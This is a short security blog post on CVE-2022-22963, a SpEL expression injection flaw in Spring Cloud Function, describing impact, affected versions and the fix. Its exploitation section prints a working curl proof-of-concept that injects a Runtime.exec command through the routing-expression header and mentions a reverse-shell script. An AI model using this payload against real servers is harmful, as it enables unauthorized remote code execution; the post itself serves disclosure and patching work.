Post

CVE-2022–22963: Spring Cloud Function RCE Vulnerability

Posted
By Aayush Shrestha 2 min read

Spring Cloud officially released a security bulletin, revealing a SpEL expression injection vulnerability (CVE-2022–22963) in a certain version of Spring Cloud Function An unauthenticated attacker constructs certain data packets to inject malicious SpEL expressions into specified HTTP request headers, resulting in remote arbitrary code execution.

What is Spring Cloud Function

Spring is a lightweight Java platform application development framework that is open source and used by millions of developers to create high-performing, easily testable code. The Spring Cloud Function framework enables developers to use Spring features to build cloud-agnostic functions. These functions may be deployed as stand-alone classes on any cloud platform to create a serverless framework.

Spring Cloud Function’s main benefit is that it includes all of the functionalities of Spring Boot-like autoconfiguration and dependency injection.

CVE-2022–22963

Exploitation of this vulnerability is simple in certain settings, since it only takes an attacker to deliver a forged HTTP request to a vulnerable machine. However, exploitation of different configurations will need more research to develop effective payloads. An unauthenticated attacker can exploit this flaw to execute arbitrary code on the victim machine.

Impact of CVE-2022–22963

According to the CVSS system, it scores 9.8 as Critical Severity. It is possible to exploit the vulnerability and completely compromise the host or container, allowing arbitrary commands to be executed. Because Spring Cloud Functions may be utilized in Cloud serverless functions, such functions may be insecure in the same way, allowing attackers to get access to your cloud account. Affected Spring Cloud Function versions,

  • 3.1.6
  • 3.2.2
  • And Older, unsupported versions are also affected.

Exploiting CVE-2022–22963

In this GitHub Repository, it contains the docker images to run and try the exploitation for yourself. Accomplishing this vulnerability is quite easy, here is the curl command to exploit the vulnerability.

1

curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\"touch /tmp/pwned")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter'

More detailed python script for Reverse Shell here.

Remediation

Spring has published a new version to address the CVE-2022–22963 vulnerability, and impacted customers are encouraged to update to the unaffected [version(https://github.com/spring-cloud/spring-cloud-function/releases/tag/v3.2.3)]. No other steps are necessary. Releases that have fixed this issue include Spring Cloud Function Version:

  • 3.1.7
  • 3.2.3
  • And Latest version
Research, CVEs
CVE-2022–22963 RCE http-injection
This post is licensed under CC BY 4.0 by the author.